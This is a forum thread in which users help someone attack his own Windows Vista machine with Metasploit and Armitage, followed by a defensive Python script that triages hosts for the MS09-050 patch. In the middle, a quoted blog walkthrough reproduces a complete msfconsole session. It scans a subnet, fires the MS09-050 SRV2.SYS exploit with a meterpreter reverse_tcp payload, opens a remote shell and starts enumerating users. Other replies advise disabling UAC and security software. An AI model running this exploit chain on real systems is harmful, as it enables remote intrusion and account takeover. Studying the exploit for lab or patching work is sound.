Metasploit And Vista


Jamo

Hi

I'm using Armitage and Metasploit.

I'm trying to attack a Windows Vista machine at my home. The target machine is mine.

The only machine that I have been able to attack and gain access to is Windows 2000.

So what exploits should I use? Please help me, I'm just trying to learn to use Metasploit.

I need to dust up on my Metasploit skills too; there was a Hak5 episode that had a Metasploit tutorial that Mubix did, but I forget which episode it was.

I just got another PC tower I would like to start practicing on for fun. I also got a book on Metasploit, but I am too lazy to read the 400 pages right now lol

What kind of errors do you receive in the Metasploit framework when you try to exploit Vista?

Plus you will need to make sure UAC is not running; I found out that it can block Metasploit's attacks.

Armitage didn't give any errors.

I scanned the target, imported it into Armitage and tried to attack the Vista machine (the target).

I tried every exploit that Armitage recommended.

UAC was on when I tried to attack that machine.

Have you tried turning off UAC? I've read in other forums that, with UAC turned on, most of the exploitation won't work very well.

2 months later...

What is the machine vulnerable to? What patches have been applied? Are you looking to do a completely remote attack against an unused fresh build of Vista? You can try 09_050. Might work.

It can be quite hard sometimes to exploit an XP or Vista machine. It all depends on how well the target machine is patched up. There are ways to make it vulnerable.

Like uninstalling the patches, making sure there are no security essentials enabled (e.g. firewall, antivirus)

And a few other things that I can't remember off the top of my head. But these are very basic steps you can take to make a host vulnerable.

A lot of times it's also not even required to be patched to be protected. I have a VM that is vulnerable to the MS08-068 flaw. It's an XP Pro SP3 machine, but if I turn off the "Server", "Workstation" and "Computer Browser" services, the attack doesn't work, since it exploits SMB with remote code execution. If a machine is vulnerable to attack, but the default services required to exploit it are turned off, you aren't going to get in using the exploits built into Metasploit. You will need something custom or browser based that can attack 3rd party apps.

Most attacks these days are browser based anyway, since they can be deployed to any number of sites you can lure the victim to, and corporate networks usually allow people to browse the internet. With that said, it's not entirely impossible to do client side attacks, but you have to know what to attack on the system that could be flawed, even when there are no services showing with a port scan. If you have patched this machine with all the latest updates, about the only ways to get in would be 3rd party apps such as Flash or Acrobat, Quicktime, older browsers such as Firefox, IE6, etc., or finding a 0-day flaw.

You can try several different methods of scanning though. While Armitage will try nmap and Metasploit scanning, you can also try other scanners such as Nessus (since it's your own network, apply for a home key and run it on your own personal boxes) to see what it can tell you as well. To exploit it, you may need a custom written exploit once you know all the target information, and this is where combining it with Metasploit would help you, but not every exploit or flaw is going to be in Metasploit by default. Part of being a pentester is having to write your own exploit code and custom shellcode, which is why you need a better understanding of the complete picture, from how buffer overflows work to bypassing DEP and ASLR, egg hunting, etc. Stuff that is just way over my head, but I know enough to keep myself out of trouble.

1 month later...

http://evilc0de.blogspot.com/2010/09/exploiting-vista-sp1-with-smb2.html

[o] Exploiting Vista SP1 with SMB2 [metasploit]
[o] Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference

root@evilc0de:~# msfconsole

                 <>
 ------------
        \   ,__,
         \  (oo)____
            (__)    )\
               ||--|| *

       =[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 590 exploits - 302 auxiliary
+ -- --=[ 224 payloads - 27 encoders - 8 nops
       =[ svn r10414 updated today (2010.09.21)

msf > use scanner/smb/smb_version
msf auxiliary(smb_version) > show options

Module options:

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target address range or CIDR identifier
   SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads

msf auxiliary(smb_version) > set RHOSTS 172.16.0.1-172.16.4.255
RHOSTS => 172.16.0.1-172.16.4.255
msf auxiliary(smb_version) > set THREADS 50
THREADS => 50
msf auxiliary(smb_version) > show options

Module options:

   Name       Current Setting          Required  Description
   ----       ---------------          --------  -----------
   RHOSTS     172.16.0.1-172.16.4.255  yes       The target address range or CIDR identifier
   SMBDomain  WORKGROUP                no        The Windows domain to use for authentication
   SMBPass                             no        The password for the specified username
   SMBUser                             no        The username to authenticate as
   THREADS    50                       yes       The number of concurrent threads

msf auxiliary(smb_version) > run

[*] 172.16.1.145 is running Windows 7 Professional (Build 7600) (language: Unknown) (name:ONAN-ULTIMECIA) (domain:ONAN-ULTIMECIA)
[*] 172.16.1.138 is running Windows Vista Ultimate Service Pack 1 (language: Unknown) (name:PUPEN-SNOWBLACK) (domain:KAPUKVALLEY)
[*] 172.16.1.173 is running Windows XP Service Pack 2+ (language: English) (name:ALLSTAR-TAPO) (domain:KAPUKVALLEY)
[*] 172.16.1.162 is running Windows 7 Ultimate (Build 7600) (language: Unknown) (name:PINKY-BENZ) (domain:KAPUKVALLEY)

msf auxiliary(smb_version) > use windows/smb/ms09_050_smb2_negotiate_func_index
msf exploit(ms09_050_smb2_negotiate_func_index) > info

       Name: Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
    Version: 9669
   Platform: Windows
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Good

Provided by:
  laurent.gaffie
  hdm
  sf

Available targets:
  Id  Name
  --  ----
  0   Windows Vista SP1/SP2 and Server 2008 (x86)

Basic options:
  Name   Current Setting  Required  Description
  ----   ---------------  --------  -----------
  RHOST                   yes       The target address
  RPORT  445              yes       The target port
  WAIT   180              yes       The number of seconds to wait for the attack to complete.

Payload information:
  Space: 1024

Description:
  This module exploits an out of bounds function table dereference in
  the SMB request validation code of the SRV2.SYS driver included with
  Windows Vista, Windows 7 release candidates (not RTM), and Windows
  2008 Server prior to R2. Windows Vista without SP1 does not seem
  affected by this flaw.

References:
  http://www.microsoft.com/technet/security/bulletin/MS09-050.mspx
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-3103
  http://www.securityfocus.com/bid/36299
  http://www.osvdb.org/57799
  http://seclists.org/fulldisclosure/2009/Sep/0039.html
  http://www.microsoft.com/technet/security/Bulletin/MS09-050.mspx

msf exploit(ms09_050_smb2_negotiate_func_index) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms09_050_smb2_negotiate_func_index) > set RHOST 172.16.1.138
RHOST => 172.16.1.138
msf exploit(ms09_050_smb2_negotiate_func_index) > set LHOST 172.16.1.12
LHOST => 172.16.1.12
msf exploit(ms09_050_smb2_negotiate_func_index) > show options

Module options:

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  172.16.1.138     yes       The target address
   RPORT  445              yes       The target port
   WAIT   180              yes       The number of seconds to wait for the attack to complete.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST     172.16.1.12      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows Vista SP1/SP2 and Server 2008 (x86)

msf exploit(ms09_050_smb2_negotiate_func_index) > exploit

[*] Started reverse handler on 172.16.1.12:4444
[*] Connecting to the target (172.16.1.138:445)...
[*] Sending the exploit packet (872 bytes)...
[*] Waiting up to 180 seconds for exploit to trigger...
[*] Sending stage (748544 bytes) to 172.16.1.138
[*] Meterpreter session 1 opened (172.16.1.12:4444 -> 172.16.1.138:55345) at 2010-09-21 23:31:10 +0700

meterpreter > sysinfo
Computer: PUPEN-SNOWBLACK
OS      : Windows Vista (Build 6001, Service Pack 1).
Arch    : x86
Language: en_US
meterpreter > shell
Process 1240 created.
Channel 1 created.
Microsoft Windows [Version 6.0.6001]
Copyright © 2006 Microsoft Corporation. All rights reserved.

C:\Windows\system32>net user
net user

User accounts for \\
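From a defender's side, the useful part of the session above is the smb_version scan plus the module's own description of which OS versions are in scope: Vista SP1/SP2, Server 2008 before R2, and Windows 7 release candidates but not RTM. The script below is an added example written for this page, not the blog author's or Metasploit's code. It parses smb_version result lines (the four lines from the session are embedded as constructed sample input) and turns the reported OS banner into a patch-verification worklist for MS09-050. Two assumptions: the banner format matched by the regular expression is the one shown on this page, and Windows 7 build 7600 is treated as the RTM build, so anything lower is a release candidate. An "exposed" result only means the banner matches the affected set; it says nothing about whether the update is installed.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed sample input: the four result lines printed by scanner/smb/smb_version
# in the session above, embedded here so the script runs offline.
SAMPLE_SCAN = """\
[*] 172.16.1.145 is running Windows 7 Professional (Build 7600) (language: Unknown) (name:ONAN-ULTIMECIA) (domain:ONAN-ULTIMECIA)
[*] 172.16.1.138 is running Windows Vista Ultimate Service Pack 1 (language: Unknown) (name:PUPEN-SNOWBLACK) (domain:KAPUKVALLEY)
[*] 172.16.1.173 is running Windows XP Service Pack 2+ (language: English) (name:ALLSTAR-TAPO) (domain:KAPUKVALLEY)
[*] 172.16.1.162 is running Windows 7 Ultimate (Build 7600) (language: Unknown) (name:PINKY-BENZ) (domain:KAPUKVALLEY)
"""

# One smb_version result line as printed on this page (assumed format);
# the "(Build NNNN)" part is optional, the Vista and XP lines lack it.
LINE_RE = re.compile(
    r"^\[\*\] (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) is running (?P<os>.+?)"
    r"(?: \(Build (?P<build>\d+)\))? \(language: (?P<lang>[^)]*)\)"
    r" \(name:(?P<name>[^)]*)\) \(domain:(?P<domain>[^)]*)\)$"
)

WIN7_RTM_BUILD = 7600  # assumption: 7600 is Windows 7 RTM; lower builds are release candidates


@dataclass
class SmbHost:
    ip: str
    os: str
    build: Optional[int]
    name: str
    domain: str


def parse_smb_version(output: str) -> List[SmbHost]:
    """Turn smb_version result lines into SmbHost records; unrelated lines are ignored."""
    hosts = []
    for line in output.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        build = int(m["build"]) if m["build"] else None
        hosts.append(SmbHost(m["ip"], m["os"], build, m["name"], m["domain"]))
    return hosts


def classify_ms09_050(host: SmbHost) -> Tuple[str, str]:
    """Map the reported OS onto the affected set from the module description.

    Returns (status, reason) with status in {"exposed", "not-affected", "unknown"}.
    "exposed" means the banner matches the affected set, not that the host is unpatched:
    the output is a list of hosts whose MS09-050 patch state must be verified.
    """
    os_ = host.os
    if "Windows Vista" in os_:
        if "Service Pack" in os_:
            return "exposed", "Vista SP1/SP2 is in the affected target set"
        return "not-affected", "module text says Vista without SP1 does not seem affected"
    if "Windows 7" in os_:
        if host.build is None:
            return "unknown", "Windows 7 with no build reported; RC builds affected, RTM not"
        if host.build < WIN7_RTM_BUILD:
            return "exposed", "Windows 7 pre-RTM build %d" % host.build
        return "not-affected", "Windows 7 RTM build %d or later" % host.build
    if "2008" in os_:
        if "R2" in os_:
            return "not-affected", "Server 2008 R2 is outside the affected set"
        return "exposed", "Server 2008 prior to R2 is in the affected set"
    return "not-affected", "OS family not named in the module description"


def triage(output: str) -> Dict[str, str]:
    """Return {ip: status} for every host parsed from the scan output."""
    return {h.ip: classify_ms09_050(h)[0] for h in parse_smb_version(output)}


if __name__ == "__main__":
    for h in parse_smb_version(SAMPLE_SCAN):
        status, reason = classify_ms09_050(h)
        print("%-14s %-13s %-40s %s (%s)" % (h.ip, status, h.os, h.name, reason))
```

Run against the sample, only 172.16.1.138 (Vista Ultimate SP1) comes back "exposed"; the two Windows 7 hosts report build 7600 and the XP host is outside the module's target list, which matches what the session then goes on to show. Feeding the same function a saved scan of your own network gives the list of machines on which to confirm the MS09-050 update, or on which to stop the Server service if SMB is not needed, as the earlier reply about MS08-068 describes.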
